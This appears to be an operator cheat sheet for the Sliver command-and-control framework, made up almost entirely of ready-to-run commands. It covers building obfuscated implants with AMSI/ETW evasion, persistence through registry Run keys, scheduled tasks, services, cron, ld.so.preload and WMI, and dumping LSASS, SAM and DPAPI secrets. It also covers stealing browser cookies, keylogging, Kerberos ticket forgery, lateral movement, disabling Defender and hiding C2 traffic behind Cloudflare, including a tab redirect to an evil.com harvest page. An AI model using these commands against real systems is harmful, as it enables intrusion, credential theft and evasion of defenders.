⚡ SLIVER C2

# Download latest release from GitHub
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux
chmod +x sliver-server_linux

# Run as daemon (systemd recommended)
./sliver-server_linux daemon

# Or install as systemd service
./sliver-server_linux install        # auto-installs systemd unit
systemctl enable sliver
systemctl start sliver
systemctl status sliver

# Download client binary
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux
chmod +x sliver-client_linux

# Or use the server binary in client mode
./sliver-server_linux          # auto-detects local server and connects

# On the SERVER: generate operator config
./sliver-server_linux operator --name operator1 --lhost YOUR_VPS_IP --save /tmp/operator1.cfg

# Transfer config to your Kali machine, then import
./sliver-client_linux import /path/to/operator1.cfg

# Connect
./sliver-client_linux

# Server: generate configs for each operator
operator --name alice --lhost 10.0.0.1 --save /tmp/alice.cfg
operator --name bob   --lhost 10.0.0.1 --save /tmp/bob.cfg

# Each operator imports and connects their config
# All operators share the same session/beacon view in real-time

# Inside client: see who's online
operators

# Send message to other operators
chat "Moving to lateral movement on HOST-01"

# Start mTLS listener on default port 8888
mtls

# Custom port
mtls --lport 443

# Bind to specific interface
mtls --lhost 0.0.0.0 --lport 8443

# View active jobs (listeners)
jobs

# Kill a listener job
jobs -k 1

# Basic HTTPS listener (uses auto-generated cert)
https

# HTTPS with custom cert (LetsEncrypt cert for OPSEC)
https --domain c2.yourdomain.com --cert /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem

# HTTP listener (lab use only)
http --lport 8080

# HTTPS with custom URI paths (C2 profile)
https --domain c2.yourdomain.com --lport 443 --website my-c2-profile

# DNS setup (register NS record: ns1.yourdomain.com → VPS_IP)
# Then start listener
dns --domains c2.yourdomain.com

# Multiple domains
dns --domains c2.domain1.com,c2.domain2.com

# Generate implant for DNS C2
generate --dns c2.yourdomain.com --os windows --save /tmp/dns_implant.exe

# Start WireGuard listener (UDP/51820)
wg

# Custom port
wg --lport 51820 --nport 8888 --key-port 1337

# Generate implant for WireGuard
generate --wg YOUR_VPS_IP --os windows

# From an existing session — start TCP pivot listener on target
# Other implants in the subnet can use this as their C2 relay
tcp-pivot --lport 9999

# Then generate implant connecting through the pivot
generate --tcp-pivot PIVOT_HOST_IP:9999 --os linux

# Windows x64 session via mTLS
generate --mtls C2_IP:8888 --os windows --arch amd64 --save /tmp/implant.exe

# Windows session via HTTPS
generate --https c2.yourdomain.com --os windows --format exe --save /tmp/impl.exe

# Linux session via mTLS
generate --mtls C2_IP:8888 --os linux --arch amd64 --save /tmp/implant_lin

# macOS session via HTTPS
generate --https c2.yourdomain.com --os mac --arch amd64 --save /tmp/implant_mac

# Session as Windows shellcode (for injection)
generate --mtls C2_IP:8888 --os windows --format shellcode --save /tmp/payload.bin

# Obfuscated session (uses garble compiler)
generate --mtls C2_IP:8888 --os windows --obfuscate --skip-symbols --save /tmp/impl_obf.exe

# Windows beacon — 60s sleep, 20% jitter via HTTPS
generate beacon --https c2.yourdomain.com --os windows --seconds 60 --jitter 20 --save /tmp/beacon.exe

# Beacon as DLL
generate beacon --https c2.yourdomain.com --os windows --format shared --save /tmp/beacon.dll

# Beacon as Windows service EXE
generate beacon --https c2.yourdomain.com --os windows --format service --save /tmp/svc_beacon.exe

# Beacon via DNS — very stealthy, slow
generate beacon --dns c2.yourdomain.com --os windows --seconds 300 --jitter 50 --obfuscate --save /tmp/dns_beacon.exe

# Linux beacon for persistence
generate beacon --mtls C2_IP:8888 --os linux --seconds 120 --save /tmp/lin_beacon

# Step 1: Generate full implant (staged payload profile)
generate --mtls C2_IP:8888 --os windows --format shellcode --save /tmp/implant.bin

# Step 2: Start HTTP stager server (serves the implant)
stage-listener --url http://C2_IP:8080/update --profile win-shellcode

# Or use the built-in stager with msfvenom-compatible format
# Stage0 (small dropper) → fetches and injects the full implant

# Generate a stager that downloads from your listener
generate stager --lhost C2_IP --lport 8080 --protocol http --format msfvenom --os windows

# Save current generate flags as a named profile
profiles new --mtls C2_IP:8888 --os windows --obfuscate --skip-symbols win-obf-mtls

# List saved profiles
profiles

# Generate from profile
profiles generate win-obf-mtls --save /tmp/new_impl.exe

# Delete profile
profiles rm win-obf-mtls

# List all sessions
sessions

# List all beacons
beacons

# Interact with a session (use tab-complete for ID)
use SESSION_ID

# Use by partial ID or name
use abc123

# Interact with beacon
use BEACON_ID

# View beacon task queue
tasks

# Watch beacon task results as they come in
tasks fetch

# Rename session
name --name DC01

# Kill session (from server)
sessions -k SESSION_ID

# Kill all dead sessions
sessions prune

# Background current session (return to sliver prompt)
background

# Host information
info               # OS, hostname, user, PID, arch, locale
whoami             # current user
getuid             # Windows SID
getgid             # group
getpid             # implant PID
getsystem          # attempt SYSTEM token elevation (Windows)
getenv             # all environment variables
getenv PATH        # specific variable
hostname           # hostname
pwd                # working directory

# Directory listing
ls
ls C:\Users\
ls -r                 # recursive

# Change directory
cd C:\Users\Administrator\Desktop

# Read file
cat C:\Users\Administrator\flag.txt
cat /etc/passwd

# Download file to operator
download C:\Users\Administrator\secret.docx
download C:\Windows\NTDS\ntds.dit /tmp/ntds.dit   # custom local path

# Upload file to target
upload /tmp/tool.exe C:\Windows\Temp\tool.exe

# Create directory
mkdir C:\Windows\Temp\ops

# Remove file
rm C:\Windows\Temp\implant.exe

# Move file
mv C:\Temp\old.exe C:\Temp\new.exe

# Search for files
grep -r "password" C:\Users\

# Find files by pattern
ls -r C:\Users\ | grep ".kdbx"

# Get file hash
info C:\Windows\System32\lsass.exe

# List processes
ps
ps -e             # show owner of each process
ps --pid 1234    # specific PID info

# Kill process
terminate 1234

# Migrate implant to another process (new session in target process)
migrate 1234

# Get memory map of a process
procdump --pid 636 --save /tmp/lsass.dmp   # dump LSASS memory

# Useful processes to note
# lsass.exe  → credentials (dump carefully)
# explorer.exe → stable parent for injection
# svchost.exe  → blends well for injection
# spoolsv.exe  → print spooler (PrintNightmare context)

# Interactive shell (creates cmd.exe or /bin/bash — NOISY)
shell

# Execute a command without interactive shell (preferred)
execute -o "whoami"                             # capture output
execute -o "ipconfig /all"
execute -o "net user"
execute -o "netstat -ano"

# Windows: run PowerShell command
execute -o "powershell.exe -nop -w hidden -c 'Get-LocalGroupMember Administrators'"

# PowerShell via execute-shellcode (stealthier)
# See execute-assembly section for .NET inline exec

# Execute and don't wait for output
execute -d "C:\Windows\Temp\tool.exe"

# Execute with specific token (if you have stolen token)
execute --token -o "whoami /all"

# Network interfaces
ifconfig          # cross-platform (Sliver built-in)
netstat           # built-in netstat

# Windows network commands via execute
execute -o "ipconfig /all"
execute -o "arp -a"
execute -o "route print"
execute -o "net view"
execute -o "net view /domain"

# Linux equivalents
execute -o "ip a"
execute -o "ip route"
execute -o "ss -tulnp"
execute -o "cat /etc/hosts"

# Run .NET assembly in-memory with arguments
execute-assembly /opt/tools/Rubeus.exe "kerberoast /outfile:tgs.txt"
execute-assembly /opt/tools/SharpHound.exe "-c All"
execute-assembly /opt/tools/Seatbelt.exe "-group=all"
execute-assembly /opt/tools/SharpUp.exe "audit"
execute-assembly /opt/tools/Certify.exe "find /vulnerable"
execute-assembly /opt/tools/SharpDPAPI.exe "triage"

# Timeout for long-running assemblies
execute-assembly --timeout 120 /opt/tools/SharpHound.exe "-c All"

# Process injection: run assembly in a sacrificial process
execute-assembly --process notepad.exe /opt/tools/Rubeus.exe "triage"

# Install BOF extensions via armory first
armory install TrustedSec-situational-awareness-bof

# Run a BOF
bof /path/to/file.o                         # no args
bof /path/to/whoami.o                        # whoami BOF
bof /path/to/netstat.o                       # netstat BOF

# BOFs from TrustedSec situational-awareness-bofs (installed via armory)
sa-whoami
sa-netstat
sa-ipconfig
sa-arpa
sa-listdns
sa-domaininfo
sa-schtaskslist
sa-env

# Load a DLL into a new sacrificial process, call exported function
sideload --process notepad.exe --export DllMain /path/to/payload.dll

# Load into specific PID
sideload --pid 1234 --export RunFunc /path/to/lib.dll

# Linux .so sideload
sideload --process /bin/sh /path/to/payload.so

# Pass arguments to exported function
sideload --process notepad.exe --export DoWork --args "arg1 arg2" /tmp/payload.dll

# Spawn a DLL in a sacrificial process using process hollowing
spawndll /path/to/reflective.dll

# Custom process
spawndll --process C:\Windows\System32\notepad.exe /tmp/payload.dll

# With export function name
spawndll --export ReflectiveDLLMain /tmp/payload.dll

# Inject shellcode from a file into a running PID
injection --pid 1234 /path/to/shellcode.bin

# Inject into a new process (spawns then injects)
injection --process C:\Windows\System32\notepad.exe /path/to/shellcode.bin

# Migrate (inject a new sliver session into another process)
migrate --pid 4321

# PPID spoofing during migration
migrate --pid 4321 --ppid 8888

# Check for Chrome processes
ps | grep chrome

# List running Chrome instances
cursed

# Start cursed session on a Chrome PID
cursed chrome --pid 1234

# Inside cursed: list tabs
cursed > tabs

# Execute JavaScript in a tab (session cookies, CSRF tokens)
cursed > js --tab 0 "document.cookie"

# Screenshot a tab
cursed > screenshot --tab 0 --save /tmp/tab0.png

# Navigate tab to URL (phishing context)
cursed > navigate --tab 0 "https://evil.com/harvest"

# Steal token from another process (impersonate their identity)
impersonate 1234         # PID of privileged process

# Verify stolen token
whoami                    # should show impersonated user
getuid

# Execute command with stolen token
execute --token -o "whoami /all"

# Revert to original token
rev2self

# Make token (pass-the-password)
make-token --username Administrator --domain CORP --password "Password123!"

# GetSystem via named-pipe impersonation
getsystem

─── WMI Exec (T1047) ───
execute -o "wmic /node:TARGET process call create 'cmd.exe /c whoami > C:\out.txt'"

─── SCM / PsExec-style (via service creation) ───
execute-assembly /opt/tools/SharpMove.exe "action=psexec target=TARGET service=svc123 command=C:\Temp\impl.exe"

─── Pass-the-Hash with make-token ───
# 1. Obtain NTLM hash from mimikatz/procdump+mimikatz
# 2. Use impacket from your operator box
execute -o "powershell.exe -nop -c 'Invoke-WMIMethod -ComputerName TARGET -Class Win32_Process -Name Create -ArgumentList whoami'"

─── SMB Beacon delivery ───
# Upload implant over SMB, execute remotely
upload /tmp/impl.exe \\TARGET\C$\Windows\Temp\impl.exe
execute -o "wmic /node:TARGET process call create 'C:\Windows\Temp\impl.exe'"

─── DCSync (from domain-joined session as DA) ───
execute-assembly /opt/tools/SharpDCSync.exe "/user:krbtgt"

─── BloodHound Collection ───
execute-assembly /opt/tools/SharpHound.exe "-c All --zipfilename loot.zip"
download C:\Windows\Temp\loot.zip

─── Kerberoasting ───
execute-assembly /opt/tools/Rubeus.exe "kerberoast /nowrap /outfile:C:\Temp\tgs.txt"
download C:\Temp\tgs.txt
# Then: hashcat -m 13100 tgs.txt rockyou.txt

─── AS-REP Roasting ───
execute-assembly /opt/tools/Rubeus.exe "asreproast /nowrap /outfile:C:\Temp\asrep.txt"
# Then: hashcat -m 18200 asrep.txt rockyou.txt

─── Unconstrained Delegation ───
execute-assembly /opt/tools/Rubeus.exe "monitor /interval:5 /nowrap"
# Trigger SpoolSS/PetitPotam to coerce DC auth
execute-assembly /opt/tools/Rubeus.exe "ptt /ticket:<base64>"   # pass-the-ticket

─── Golden Ticket ───
execute-assembly /opt/tools/Rubeus.exe "golden /rc4:KRBTGT_NTLM /domain:CORP.LOCAL /sid:DOMAIN_SID /user:Administrator /ptt"

─── Silver Ticket ───
execute-assembly /opt/tools/Rubeus.exe "silver /rc4:SVC_NTLM /domain:CORP.LOCAL /sid:DOMAIN_SID /user:Admin /service:cifs/DC01 /ptt"

─── ADCS Abuse (ESC1) ───
execute-assembly /opt/tools/Certify.exe "find /vulnerable"
execute-assembly /opt/tools/Certify.exe "request /ca:CA /template:VulnTemplate /altname:Administrator"
execute-assembly /opt/tools/Rubeus.exe "asktgt /user:Administrator /certificate:cert.pfx /ptt"

# Start SOCKS5 proxy on implant (listens locally on your operator box)
socks5 start --host 127.0.0.1 --port 1080

# View active SOCKS listeners
socks5

# Stop SOCKS5
socks5 stop --id 1

─── Using SOCKS5 from your Kali box ───
# /etc/proxychains4.conf → add: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 445,3389,22 192.168.1.0/24
proxychains crackmapexec smb 192.168.1.10 -u admin -p 'pass'
proxychains impacket-psexec CORP/admin:'pass'@192.168.1.10
proxychains evil-winrm -i 192.168.1.10 -u admin -p 'pass'
proxychains curl http://192.168.1.10:8080/

# Forward local port to remote target via implant
# Local 127.0.0.1:3389 → target INTERNAL_IP:3389
portfwd add --lport 3389 --rhost INTERNAL_IP --rport 3389

# Local 127.0.0.1:8080 → internal web server
portfwd add --lport 8080 --rhost 10.10.10.5 --rport 80

# List port forwards
portfwd

# Remove a port forward
portfwd rm --id 1

# Now connect locally:
xfreerdp /u:admin /p:pass /v:127.0.0.1:3389
curl http://127.0.0.1:8080/admin

── Step 1: On the pivot implant (Session A — has internet access) ──
tcp-pivot --lport 9999

── Step 2: Generate implant for inner target pointing to pivot host ──
generate --tcp-pivot PIVOT_HOST_IP:9999 --os windows --save /tmp/inner.exe

── Step 3: Deliver inner.exe to the isolated target ──
# Upload via pivot session
upload /tmp/inner.exe \\INNER_HOST\C$\Temp\inner.exe

── Step 4: Execute on inner target — new session appears on C2 ──
execute -o "wmic /node:INNER_HOST process call create 'C:\Temp\inner.exe'"

# From existing session — create WG tunnel into internal network
wg-portfwd add --lhost 127.0.0.1 --lport 1080 --rhost INTERNAL_IP --rport 22

# Generate new implant using WireGuard transport back through this tunnel
generate --wg C2_IP --os linux --save /tmp/wg_impl

# Obfuscation via garble (randomizes symbols, strings)
generate --obfuscate --mtls C2_IP:8888 --os windows

# Strip debug symbols
generate --skip-symbols --mtls C2_IP:8888 --os windows

# Enable evasion (disables AMSI, ETW patching)
generate --evasion --mtls C2_IP:8888 --os windows

# Combine all evasion flags
generate --obfuscate --skip-symbols --evasion --https c2.yourdomain.com --os windows --save /tmp/evade.exe

# Patch AMSI in current process (from session/beacon)
# With --evasion flag this happens automatically
# Manually via execute-assembly:
execute-assembly /opt/tools/AmsiPatch.exe

# Disable ETW (Event Tracing for Windows) via BOF
execute-assembly /opt/tools/ETWPatch.exe

# Generate shellcode, wrap in custom loader (external)
generate --os windows --format shellcode --mtls C2_IP:8888 --save /tmp/sliver.bin

# Now wrap with: donut, ScareCrow, Nimcrypt2, or custom Go loader
# Example: ScareCrow wraps the shellcode into a DLL with sandbox evasion
ScareCrow -I /tmp/sliver.bin -Loader binary -domain microsoft.com -O /tmp/wrapped.exe

# Example: donut converts .NET assembly to shellcode for injection
donut -f 2 -i /opt/Rubeus.exe -a 2 -o /tmp/rubeus.bin

# Use Nimcrypt2 for stealthy loader
nimcrypt2 -f /tmp/sliver.bin -o /tmp/loader.exe -t exe --sleep-time 3

# Create a website profile (fake web content on C2 server)
websites add-content --website fake-corp --web-path / --content /var/www/html/index.html --content-type "text/html"

# List websites
websites

# Remove website
websites rm fake-corp

# HTTP C2 profile: customize URIs, headers, user-agents
# Edit the HTTP C2 config file for fine-grained control:
# ~/.sliver/configs/http-c2.json
# Set custom URI paths, user-agent strings, response codes, headers

# Example custom UA implant (via generate)
# Edit generate command with --http-c2-profile to use a modified profile

✔ Use HTTPS with real domain + LetsEncrypt cert (not self-signed)
✔ Beacon sleep ≥ 60s with 20-50% jitter
✔ Use --obfuscate --skip-symbols --evasion on all implants
✔ Avoid cmd.exe/powershell.exe spawning — use execute-assembly/BOF
✔ Migrate into stable, non-security processes
✔ Clean up artifacts: delete uploaded tools after use
✔ Route C2 through HTTPS CDN or Cloudflare for domain fronting
✔ Avoid writing to disk — use in-memory execution
✔ Check domain/IP reputation before use:
   curl https://urlhaus-api.abuse.ch/v1/host/ -d "host=your.domain"
   → virustotal, shodan, censys IP check
✔ Canary domains: embed --canary flag to detect sandboxing
✔ Limit implant lifetime: set expiry in generate (--days flag)
✔ Log everything on operator side for deconfliction

# Recommended: Sliver server on VPS (Njalla, Vultr, etc.)
# Operator connects from Kali → VPS over port 31337 (mTLS)
# Implants connect back to VPS over 443 (HTTPS)

# Firewall rules on VPS (UFW example)
ufw allow 31337/tcp   # operator mTLS
ufw allow 443/tcp     # implant HTTPS
ufw allow 53/udp      # implant DNS
ufw allow 22/tcp      # SSH management
ufw default deny incoming
ufw enable

# Nginx reverse proxy (optional — for domain fronting)
# Proxy HTTPS traffic to Sliver on localhost:8443
# Serves legit content on / path, C2 on /api/... paths

# Generate LetsEncrypt cert for your domain
certbot certonly --standalone -d c2.yourdomain.com

# Start Sliver with HTTPS using real cert
https --domain c2.yourdomain.com --cert /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem

# List all available armory packages
armory

# Search for specific tool
armory search rubeus
armory search bof

# Install a package
armory install rubeus
armory install SharpHound
armory install Seatbelt
armory install SharpUp
armory install Certify
armory install TrustedSec-situational-awareness-bof
armory install nanodump            # stealthy LSASS dump
armory install mimikatz            # mimi via assembly

# Install all packages at once
armory install all

# Update installed packages
armory update

# Extensions are defined by extension.json + compiled binary/BOF
# Load a custom extension from directory
extensions load /path/to/extension/dir/

# Or install from a .tar.gz package
armory install --package /tmp/custom-extension.tar.gz

# List installed extensions
extensions

# List loaded aliases
aliases

# Write Run key (HKCU — no admin needed)
registry write --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run" --value "WindowsUpdate" --type string --data "C:\Windows\Temp\beacon.exe"

# Verify
registry read --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run"

# HKLM Run (needs admin)
registry write --hive HKLM --key "Software\Microsoft\Windows\CurrentVersion\Run" --value "SvcHost32" --type string --data "C:\Windows\System32\svchost32.exe"

# Stealthier: RunOnce, RunServices, Winlogon Userinit
registry write --hive HKLM --key "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" --value "Userinit" --type string --data "C:\Windows\system32\userinit.exe,C:\Temp\beacon.exe"

# Create scheduled task via execute (SYSTEM-level)
execute -o "schtasks /create /tn 'WindowsDefenderUpdate' /tr 'C:\Windows\Temp\beacon.exe' /sc onlogon /ru SYSTEM /f"

# Trigger on system start
execute -o "schtasks /create /tn 'SysUpdate' /tr 'C:\Windows\Temp\beacon.exe' /sc onstart /ru SYSTEM /f"

# Trigger every 15 minutes (repeat)
execute -o "schtasks /create /tn 'NetHealth' /tr 'C:\Windows\Temp\beacon.exe' /sc minute /mo 15 /ru SYSTEM /f"

# Use SharpPersist (via armory) for stealthy task creation
execute-assembly /opt/tools/SharpPersist.exe "-t scheduledtask -c C:\Windows\Temp\beacon.exe -n SysUpdate -m add"

# List tasks to verify
execute -o "schtasks /query /tn 'SysUpdate'"

# Remove task during cleanup
execute -o "schtasks /delete /tn 'SysUpdate' /f"

# Generate beacon as service EXE
generate beacon --https c2.yourdomain.com --os windows --format service --save /tmp/svc.exe

# Upload and register service (requires SYSTEM/Admin)
upload /tmp/svc.exe C:\Windows\System32\WindowsUpdateSvc.exe
execute -o "sc create WindowsUpdateSvc binpath= C:\Windows\System32\WindowsUpdateSvc.exe start= auto"
execute -o "sc start WindowsUpdateSvc"

# Verify
execute -o "sc query WindowsUpdateSvc"

# Cleanup
execute -o "sc stop WindowsUpdateSvc && sc delete WindowsUpdateSvc"

# User startup (no admin needed)
upload /tmp/beacon.exe "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beacon.exe"

# All-users startup (admin needed)
upload /tmp/beacon.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\update.exe"

# Disguise as shortcut (.lnk) via PowerShell
execute -o "powershell -nop -c \"$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sysupdate.lnk');$s.TargetPath='C:\\Windows\\Temp\\beacon.exe';$s.Save()\""

# Cron job (every minute)
execute -o "(crontab -l 2>/dev/null; echo '* * * * * /tmp/.update') | crontab -"

# System-level cron (root required)
execute -o "echo '* * * * * root /opt/.svc' >> /etc/crontab"

# Systemd service (root)
upload /tmp/lin_beacon /opt/.svc
execute -o "chmod +x /opt/.svc"
execute -o "cat > /etc/systemd/system/netupdate.service << EOF\n[Unit]\nDescription=Network Update\n[Service]\nExecStart=/opt/.svc\nRestart=always\n[Install]\nWantedBy=multi-user.target\nEOF"
execute -o "systemctl enable netupdate && systemctl start netupdate"

# SSH authorized_keys (persistence as specific user)
execute -o "echo 'ssh-rsa AAAA...YOUR_KEY...' >> /home/victim/.ssh/authorized_keys"

# .bashrc / .profile (fires on login — noisy)
execute -o "echo '/tmp/.update &' >> /home/victim/.bashrc"

# LD_PRELOAD hook (advanced — runs on every dynamically linked exec)
upload /tmp/hook.so /lib/x86_64-linux-gnu/libsecurity.so
execute -o "echo '/lib/x86_64-linux-gnu/libsecurity.so' >> /etc/ld.so.preload"

# Via SharpPersist (armory) — most reliable approach
execute-assembly /opt/tools/SharpPersist.exe "-t wmi -c C:\Windows\Temp\beacon.exe -n PersistWMI -m add"

# Manual via PowerShell (for reference / custom triggers)
execute -o "powershell -nop -c \"$filter=Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='SysFilter';EventNameSpace='root\cimv2';QueryLanguage='WQL';Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_LocalTime\"'};$consumer=Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='SysConsumer';ExecutablePath='C:\\Windows\\Temp\\beacon.exe'};Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$filter;Consumer=$consumer}\""

# List WMI subscriptions (defender check)
execute -o "Get-WMIObject -Namespace root\subscription -Class __EventFilter"
execute -o "Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer"

# Cleanup WMI persistence
execute -o "Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Remove-WMIObject"
execute -o "Get-WMIObject -Namespace root\subscription -Class __EventFilter -Filter \"Name='SysFilter'\" | Remove-WMIObject"
execute -o "Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter \"Name='SysConsumer'\" | Remove-WMIObject"

─── Method 1: nanodump (armory — stealthy) ───
armory install nanodump
nanodump --write C:\Windows\Temp\nd.dmp --valid    # valid signature bypass
download C:\Windows\Temp\nd.dmp

─── Method 2: Sliver procdump (built-in) ───
ps | grep lsass             # get LSASS PID
procdump --pid 636 --save /tmp/lsass.dmp

─── Method 3: comsvcs.dll via execute (less EDR hooks) ───
execute -o "powershell -nop -c \"[System.Reflection.Assembly]::LoadWithPartialName('System.Runtime.InteropServices'); (Get-Process lsass).Id | ForEach-Object { rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $_ C:\Windows\Temp\lsass.dmp full }\""
download C:\Windows\Temp\lsass.dmp

─── Offline parsing on Kali ───
# pypykatz (pure Python, no Windows needed)
pypykatz lsa minidump lsass.dmp

# Or: mimikatz on Windows
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords

# Shadow-copy based registry export (no lock conflict)
execute -o "reg save HKLM\SAM C:\Windows\Temp\sam.hiv /y"
execute -o "reg save HKLM\SYSTEM C:\Windows\Temp\sys.hiv /y"
execute -o "reg save HKLM\SECURITY C:\Windows\Temp\sec.hiv /y"
download C:\Windows\Temp\sam.hiv
download C:\Windows\Temp\sys.hiv
download C:\Windows\Temp\sec.hiv

# Extract on Kali
impacket-secretsdump -sam sam.hiv -system sys.hiv -security sec.hiv LOCAL

# In-memory SAM dump via execute-assembly (mimikatz)
armory install mimikatz
mimikatz "lsadump::sam" "exit"

# Full DPAPI triage (user-context blobs)
sharp-dpapi triage

# Machine-context DPAPI (SYSTEM) — vaults, GPP passwords
sharp-dpapi machinetriage

# Specifically target Chrome credentials
sharp-dpapi credentials

# Target saved RDP credentials
execute -o "cmdkey /list"
sharp-dpapi rdg

# Vault credentials (Windows Credential Manager)
sharp-dpapi vaults

# When you have DA creds — decrypt all user blobs domain-wide
sharp-dpapi masterkeys /pvk:domain_backup.pvk

─── Chrome / Edge (DPAPI-protected Login Data) ───
sharp-dpapi logins                                     # via DPAPI

# Manual — copy Login Data, decrypt offline
download "C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"
download "C:\Users\victim\AppData\Local\Google\Chrome\User Data\Local State"
# Then: python3 chrome_decrypt.py (many tools available)

─── Firefox ───
download "C:\Users\victim\AppData\Roaming\Mozilla\Firefox\Profiles"
# firefox_decrypt.py --export-pass

─── Via Cursed (live session cookies — no decrypt needed) ───
cursed chrome --pid <CHROME_PID>
cursed > js --tab 0 "JSON.stringify(document.cookie)"

─── LaZagne (all-in-one, via execute-assembly) ───
execute-assembly /opt/tools/LaZagne.exe "all"

# PowerShell credential files (.xml)
execute -o "Get-ChildItem -Path C:\ -Recurse -Include *.xml -ErrorAction SilentlyContinue | Select-String -Pattern 'password' | Select-Object Path"

# Configuration files containing credentials
execute -o "Get-ChildItem -Recurse -Path C:\inetpub,C:\xampp,C:\Apache24 -Include web.config,applicationHost.config -ErrorAction SilentlyContinue"
cat C:\inetpub\wwwroot\web.config

# Unattend.xml / sysprep (often has local admin pass)
execute -o "Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml -ErrorAction SilentlyContinue"

# SSH private keys on Windows
execute -o "Get-ChildItem -Path C:\Users -Recurse -Include id_rsa,id_ecdsa,*.pem -ErrorAction SilentlyContinue"

# KeePass database files
execute -o "Get-ChildItem -Path C:\ -Recurse -Include *.kdbx -ErrorAction SilentlyContinue 2>$null"

# GPP passwords (SYSVOL — domain-joined, pre-2014 DCs)
execute -o "Get-ChildItem -Path \\DC01\SYSVOL -Recurse -Include Groups.xml,Services.xml,Scheduledtasks.xml -ErrorAction SilentlyContinue"
# gpp-decrypt <cpassword> — static AES key, instant decrypt

# Linux: common credential locations
execute -o "find /home /root /etc /var/www -name '*.conf' -o -name '*.env' -o -name '.htpasswd' 2>/dev/null | xargs grep -lE 'pass|secret|key|token' 2>/dev/null"
execute -o "cat /home/*/.ssh/id_rsa 2>/dev/null"
execute -o "cat /home/*/.bash_history 2>/dev/null"

# Capture current desktop
screenshot
# Saved locally to: ~/.sliver/loot/screenshot-*.png

# Save to specific path on operator box
screenshot --save /tmp/target-desktop.png

# Loop screenshots (manual — in beacon via tasks)
# Use reaction or a quick loop in interactive session

# Start keylogger on current session (Windows)
start-key-logger

# Dump captured keystrokes
dump-key-logger

# Stop keylogger
stop-key-logger

# Via execute-assembly (SharpKeys or similar BOF)
execute-assembly /opt/tools/KeyLogger.exe

# Read a registry value
registry read --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run"

# Read entire key (all values)
registry read --hive HKLM --key "SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"

# Write a registry value
registry write --hive HKCU --key "Software\MyApp" --value "Config" --type string --data "value123"

# Types: string, expandstring, binary, dword, qword, multistring
registry write --hive HKLM --key "SOFTWARE\Policies\Microsoft\Windows Defender" --value "DisableAntiSpyware" --type dword --data "1"

# Create a new registry key
registry create --hive HKCU --key "Software\NewKey"

# Delete a registry value
registry rm --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run" --value "MaliciousEntry"

# Useful keys to check
# Autorun:    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Services:   HKLM\SYSTEM\CurrentControlSet\Services\
# LSA:        HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
# WDigest:    HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
# Defender:   HKLM\SOFTWARE\Policies\Microsoft\Windows Defender

# Enable WDigest (forces creds in LSASS memory — pre-Win8.1 compat)
registry write --hive HKLM --key "SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" --value "UseLogonCredential" --type dword --data "1"

# View all loot collected (files, creds, screenshots)
loot

# Fetch a specific loot item by ID
loot fetch <LOOT_ID>

# Add credentials to loot store manually
creds add --username Administrator --password "Password123!" --host DC01

# Add hash to creds
creds add --username Administrator --hash "aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c"

# View all credentials in store
creds

# List all tracked hosts
hosts

# Detailed host info
hosts <HOST_ID>

# Watch all server events live
monitor

# List available event types
reaction

# Auto-run commands when a new session opens
reaction set-session --event session-opened -c "info; whoami; ps"

# Auto-run on new beacon
reaction set-beacon --event beacon-registered -c "info"

# List active reactions
reaction list

# Remove a reaction
reaction unset <REACTION_ID>

// ~/.sliver/configs/http-c2.json — key fields
{
  "implant_config": {
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0",
    "chrome_base_version": 100,
    "headers": [
      { "name": "Accept", "value": "text/html,application/xhtml+xml" },
      { "name": "Accept-Language", "value": "en-US,en;q=0.9" }
    ],
    "url_parameters": [
      { "name": "_", "value": "timestamp" }
    ],
    "extra_urls": [
      { "method": "GET", "path": "/api/v2/health" },
      { "method": "POST", "path": "/api/v2/data" }
    ]
  },
  "server_config": {
    "headers": [
      { "name": "Server", "value": "nginx/1.18.0" },
      { "name": "X-Powered-By", "value": "PHP/7.4.3" }
    ]
  }
}

# Apply the HTTP C2 config when starting listener
https --domain c2.yourdomain.com     # auto-picks up http-c2.json

# Create a fake website to serve on root path (blueteam misdirection)
websites add-content --website decoy --web-path / --content /var/www/html/index.html --content-type "text/html"
https --domain c2.yourdomain.com --website decoy

── Setup ──
1. Register your C2 domain (e.g. c2.yourdomain.com)
2. Add to Cloudflare DNS — set A record to VPS IP
3. Enable Cloudflare proxy (orange cloud icon)
4. In Cloudflare SSL/TLS → set to Full or Full(Strict)
5. Cloudflare now proxies HTTPS: implant → Cloudflare → VPS

── Generate implant pointing to Cloudflare-proxied domain ──
generate beacon --https c2.yourdomain.com --os windows --seconds 60 --jitter 20

── Traffic flow ──
